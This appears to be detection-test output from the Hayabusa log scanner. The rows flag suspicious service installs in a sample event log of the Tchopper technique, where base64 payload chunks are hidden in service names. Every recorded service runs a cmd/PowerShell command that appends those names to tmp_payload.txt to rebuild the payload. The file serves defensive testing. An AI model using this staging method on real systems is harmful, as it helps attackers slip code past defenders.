+2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:42.386 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:43.824 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:45.277 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:46.746 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:48.200 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:49.641 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:51.086 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
